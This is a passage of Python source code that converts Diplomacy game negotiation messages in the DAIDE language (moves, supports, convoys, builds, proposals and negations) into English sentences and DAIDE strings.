self.english = 'I believe that if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
if self.alternative is not None:
self.english += ' If not this, then ' + self.antecedent.formsimpleenglish() + '.'
# (HUH (FCT (IFF
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a trade.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the conditional in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = 'if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
if self.alternative is not None:
self.simpleenglish += ', otherwise ' + self.alternative.formsimpleenglish()
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
retval = 'IFF ' + '(' + self.antecedent.formDAIDE() + ') (' + self.consequent.formDAIDE() + ')'
if self.alternative is not None:
retval += ' ELS (' + self.alternative.formDAIDE() + ')'
return retval
class PressNot(PressMessage):
""" The game-related content of a negation. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
self.proposition = PressMessage(utterance, self)
if thelists is None or len(thelists) == 0:
self.operator = 'NOT'
propword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO'])
self.proposition = randomFactory(utterance, self, propword)
elif len(thelists) == 2:
self.operator = thelists[0]
self.proposition = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the negation in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.proposition.formenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the negation in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = self.proposition.formsimpleenglish() + ' is not happening'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'NOT ' + '(' + self.proposition.formDAIDE() + ')'
class PressNar(PressMessage):
""" The game-related content of missing evidence. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
self.proposition = PressMessage(utterance, self)
if thelists is None or len(thelists) == 0:
self.operator = 'NAR'
propword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO'])
self.proposition = randomFactory(utterance, self, propword)
elif len(thelists) == 2:
self.operator = thelists[0]
self.proposition = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the missing evidence in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.proposition.formenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the missing evidence in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = 'it is uncertain that ' + self.proposition.formsimpleenglish()
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'NAR ' + '(' + self.proposition.formDAIDE() + ')'
class PressMoveExecute(PressMessage):
""" The game-related content of an executable move. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'XDO'
detword = random.choice(['HLD', 'MTO', 'SUP', 'SUPMTO', 'CVYCTO', 'CVYVIA', 'RTO', 'DSB', 'BLD', 'REM', 'WVE'])
self.details = randomFactory(utterance, self, detword)
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the executable move in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.container.operator == 'PRP':
# (PRP (XDO
if self.container.container is None:
self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' this move: ' + self.details.formsimpleenglish()
# (YES (PRP (XDO
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with', 'accept']) + ' the move: ' + self.details.formsimpleenglish()
# (REJ (PRP (XDO
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' the move: ' + self.details.formsimpleenglish()
# (CCL (PRP (XDO
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of the move: ' + self.details.formsimpleenglish()
# (HUH (PRP (XDO
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your move proposal.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (XDO
if self.container.container.container is None:
self.english = 'I do not want the following move to happen: ' + self.details.formsimpleenglish()
# (YES (PRP (NOT (XDO
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that this move will not happen: ' + self.details.formsimpleenglish()
# (REJ (PRP (NOT (XDO
elif self.container.container.container.operator == 'REJ':
self.english = 'I do not promise that I won\'t make this move: ' + self.details.formsimpleenglish()
# (CCL (PRP (NOT (XDO
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my objection to the move: ' + self.details.formsimpleenglish()
# (HUH (PRP (NOT (XDO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a move.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (XDO
if self.container.container.container is None:
self.english = 'It is unlikely that this move will occur: ' + self.details.formsimpleenglish()
# (HUH (FCT (NOT (XDO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a move.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (XDO
if self.container.container.container is None:
self.english = 'I am not sure about the move: ' + self.details.formsimpleenglish()
# (YES (PRP (NAR (XDO
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that we should be hesitant about the move: ' + self.details.formsimpleenglish()
# (REJ (PRP (NAR (XDO
elif self.container.container.container.operator == 'REJ':
self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that we should be sure about the move: ' + self.details.formsimpleenglish()
# (CCL (PRP (NAR (XDO
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my hesitance about the move: ' + self.details.formsimpleenglish()
# (HUH (PRP (NAR (XDO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a move.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (XDO
if self.container.container.container is None:
self.english = 'It is unclear if this move will happen: ' + self.details.formsimpleenglish()
# (HUH (FCT (NAR (XDO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a move.'
elif self.container.operator == 'FCT':
# (FCT (XDO
if self.container.container is None:
self.english = 'This move will happen: ' + self.details.formsimpleenglish()
# (HUH (FCT (XDO
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a move.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the missing evidence in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = self.details.formsimpleenglish()
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'XDO ' + '(' + self.details.formDAIDE() + ')'
class PressHold(PressMessage):
""" The game-related content of a hold. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'HLD'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
elif len(thelists) == 2:
self.operator = thelists[1]
self.unit = thelists[0]
def formenglish(self): # type () -> str
"""
Creates an English expression about the hold in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the hold in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
' holds their ' + \
helpers.unitdict[self.unit[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.unit[2]]['Objective'] + '.'
if 'Expert' in self.utterance.tones:
unittype = 'A'
if self.unit[1] == 'FLT':
unittype = 'F'
self.simpleenglish += ' (' + unittype + ' ' + self.unit[2] + ' H).'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.unit) + ') HLD'
class PressMoveInto(PressMessage):
""" The game-related content of a move. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'MTO'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
provlist = [curprov for curprov in helpers.provincelist if curprov != self.unit[2]]
self.province = random.choice(provlist)
elif len(thelists) == 3:
self.operator = thelists[1]
self.unit = thelists[0]
self.province = thelists[2]
def formenglish(self): # type () -> str
"""
Creates an English expression about the move in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the move in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
' moves their ' + \
helpers.unitdict[self.unit[1]]['Objective'] + \
' from ' + \
helpers.provincedict[self.unit[2]]['Objective'] + \
' to ' + \
helpers.provincedict[self.province]['Objective'] + '.'
if 'Expert' in self.utterance.tones:
unittype = 'A'
if self.unit[1] == 'FLT':
unittype = 'F'
self.simpleenglish += ' (' + unittype + ' ' + self.unit[2] + ' -> ' + self.province + ').'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.unit) + ') MTO ' + self.province
class PressSupportHold(PressMessage):
""" The game-related content of a hold support. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'SUP'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.supporter = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supporter = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supporter = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
if random.choice([True, True, False]):
if random.choice([True, False]):
self.supported = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supported = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supported = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
elif len(thelists) == 3:
self.operator = thelists[1]
self.supporter = thelists[0]
self.supported = thelists[2]
def formenglish(self): # type () -> str
"""
Creates an English expression about the hold support in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the hold support in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.supporter[0]]['Objective'] + \
' provides support with their ' + \
helpers.unitdict[self.supporter[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.supporter[2]]['Objective'] + \
' for ' + \
helpers.powerdict[self.supported[0]]['Objective'] + \
' to hold their ' + \
helpers.unitdict[self.supported[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.supported[2]]['Objective'] + '.'
if 'Expert' in self.utterance.tones:
supportertype = 'A'
if self.supporter[1] == 'FLT':
supportertype = 'F'
supportedtype = 'A'
if self.supported[1] == 'FLT':
supportedtype = 'F'
self.simpleenglish += ' (' + supportertype + ' ' + self.supporter[2] + ' S ' + supportedtype + ' ' + self.supported[2] + ' H).'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.supporter) + ') SUP (' + ' '.join(self.supported) + ')'
class PressSupportMove(PressMessage):
""" The game-related content of a move support. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'SUP'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.supporter = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supporter = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supporter = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
if random.choice([True, True, False]):
if random.choice([True, False]):
self.supported = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supported = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.supported = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
provlist = [curprov for curprov in helpers.provincelist if curprov != self.supporter[2] and curprov != self.supported[2]]
self.province = random.choice(provlist)
elif len(thelists) == 5:
self.operator = thelists[1]
self.supporter = thelists[0]
self.supported = thelists[2]
self.province = thelists[4]
def formenglish(self): # type () -> str
"""
Creates an English expression about the move support in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the move support in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.supporter[0]]['Objective'] + \
' provides support with their ' + \
helpers.unitdict[self.supporter[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.supporter[2]]['Objective'] + \
' so ' + \
helpers.powerdict[self.supported[0]]['Objective'] + \
' can move their ' + \
helpers.unitdict[self.supported[1]]['Objective'] + \
' from ' + \
helpers.provincedict[self.supported[2]]['Objective'] + \
' into ' + \
helpers.provincedict[self.province]['Objective'] + '.'
if 'Expert' in self.utterance.tones:
supportertype = 'A'
if self.supporter[1] == 'FLT':
supportertype = 'F'
supportedtype = 'A'
if self.supported[1] == 'FLT':
supportedtype = 'F'
self.simpleenglish += ' (' + supportertype + ' ' + self.supporter[2] + ' S ' + supportedtype + ' ' + self.supported[2] + ' -> ' + self.province + ').'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.supporter) + ') SUP (' + ' '.join(self.supported) + ') MTO ' + self.province
class PressConvoy(PressMessage):
""" The game-related content of a convoy. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'CVY'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.convoyunit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.convoyunit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.convoyunit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
if random.choice([True, True, False]):
if random.choice([True, False]):
self.convoyedunit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.convoyedunit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.convoyedunit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
provlist = [curprov for curprov in helpers.provincelist if curprov != self.convoyunit[2] and curprov != self.convoyedunit[2]]
self.province = random.choice(provlist)
elif len(thelists) == 5:
self.operator = thelists[1]
self.convoyunit = thelists[0]
self.convoyedunit = thelists[2]
self.province = thelists[4]
def formenglish(self): # type () -> str
"""
Creates an English expression about the convoy in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the convoy in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.convoyunit[0]]['Objective'] + \
'\'s ' + \
helpers.unitdict[self.convoyunit[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.convoyunit[2]]['Objective'] + \
' convoys ' + \
helpers.powerdict[self.convoyedunit[0]]['Objective'] + \
'\'s ' + \
helpers.unitdict[self.convoyedunit[1]]['Objective'] + \
' from ' + \
helpers.provincedict[self.convoyedunit[2]]['Objective'] + \
' into ' + \
helpers.provincedict[self.province]['Objective'] + '.'
if 'Expert' in self.utterance.tones:
convoytype = 'F'
convoyedtype = 'A'
self.simpleenglish += ' (' + convoytype + ' ' + self.convoyunit[2] + ' C ' + convoyedtype + ' ' + self.convoyedunit[2] + ' -> ' + self.province + ').'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.convoyunit) + ') CVY (' + ' '.join(self.convoyedunit) + ') CTO ' + self.province
class PressConvoyVia(PressMessage):
""" The game-related content of a convoy over water. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'CTO'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.convoyedunit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.convoyedunit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.convoyedunit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
provlist = [curprov for curprov in helpers.provincelist if curprov != self.convoyedunit[2]]
self.destination = random.choice(provlist)
self.searoute = random.sample(helpers.sealist, random.randint(1, 4))
elif len(thelists) == 5:
self.operator = thelists[1]
self.convoyedunit = thelists[0]
self.destination = thelists[2]
self.searoute = thelists[4]
def formenglish(self): # type () -> str
"""
Creates an English expression about the convoy over water in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the convoy over water in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.convoyedunit[0]]['Objective'] + \
'\'s ' + \
helpers.unitdict[self.convoyedunit[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.convoyedunit[2]]['Objective'] + \
' moves by convoy to ' + \
helpers.provincedict[self.destination]['Objective'] + \
' following this path: ' + \
helpers.listOfProvinces(self.searoute) + '.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.convoyedunit) + ') CTO ' + self.destination + ' VIA (' + ' '.join(self.searoute) + ')'
class PressRetreat(PressMessage):
""" The game-related content of a retreat. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'RTO'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
provlist = [curprov for curprov in helpers.provincelist if curprov != self.unit[2]]
self.destination = random.choice(provlist)
elif len(thelists) == 3:
self.operator = thelists[1]
self.unit = thelists[0]
self.destination = thelists[2]
def formenglish(self): # type () -> str
"""
Creates an English expression about the retreat in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the retreat in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
'\'s ' + \
helpers.unitdict[self.unit[1]]['Objective'] + \
' retreats from ' + \
helpers.provincedict[self.unit[2]]['Objective'] + \
' to ' + \
helpers.provincedict[self.destination]['Objective'] + '.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.unit) + ') RTO ' + self.destination
class PressDisband(PressMessage):
""" The game-related content of a disband. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'DSB'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
elif len(thelists) == 2:
self.operator = thelists[1]
self.unit = thelists[0]
def formenglish(self): # type () -> str
"""
Creates an English expression about the disband in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the disband in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
'\'s ' + \
helpers.unitdict[self.unit[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.unit[2]]['Objective'] + \
' retreats from the board.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.unit) + ') DSB'
class PressBuild(PressMessage):
""" The game-related content of a build. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'BLD'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.supplylist)]
else:
self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.supplylist)]
else:
self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.supplylist)]
elif len(thelists) == 2:
self.operator = thelists[1]
self.unit = thelists[0]
def formenglish(self): # type () -> str
"""
Creates an English expression about the build in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the build in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
' builds a new ' + \
helpers.unitdict[self.unit[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.unit[2]]['Objective'] + \
'.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.unit) + ') BLD'
class PressRemove(PressMessage):
""" The game-related content of a remove. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'REM'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
else:
self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
elif len(thelists) == 2:
self.operator = thelists[1]
self.unit = thelists[0]
def formenglish(self): # type () -> str
"""
Creates an English expression about the remove in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the remove in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
' removes their ' + \
helpers.unitdict[self.unit[1]]['Objective'] + \
' in ' + \
helpers.provincedict[self.unit[2]]['Objective'] + \
' from the board.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return '(' + ' '.join(self.unit) + ') REM'
class PressWaive(PressMessage):
""" The game-related content of a waive. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'WVE'
if random.choice([True, True, False]):
if random.choice([True, False]):
self.power = utterance.frompower
else:
self.power = random.choice(utterance.topowers)
else:
self.power = random.choice(helpers.powerlist)
elif len(thelists) == 2:
self.operator = thelists[1]
self.power = thelists[0]
def formenglish(self): # type () -> str
"""
Creates an English expression about the waive in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the waive in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.powerdict[self.power]['Objective'] + \
' waives their build turn.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return self.power + ' WVE'
def messageFactory(utterance, container, daidelists): # type: (PressUtterance, PressMessage, []) -> PressMessage
"""
Creates the objects and subobjects corresponding to a nested DAIDE list
:param utterance: the original DAIDE utterance
:type utterance: PressUtterance
:param container: the DAIDE message that contains this one
:type container: PressMessage
:param daidelists: the parsed nested DAIDE expression
:type daidelists: []
:return: a DAIDE message
:rtype: PressMessage
"""
if daidelists is None or len(daidelists) == 0:
return PressMessage(utterance, container)
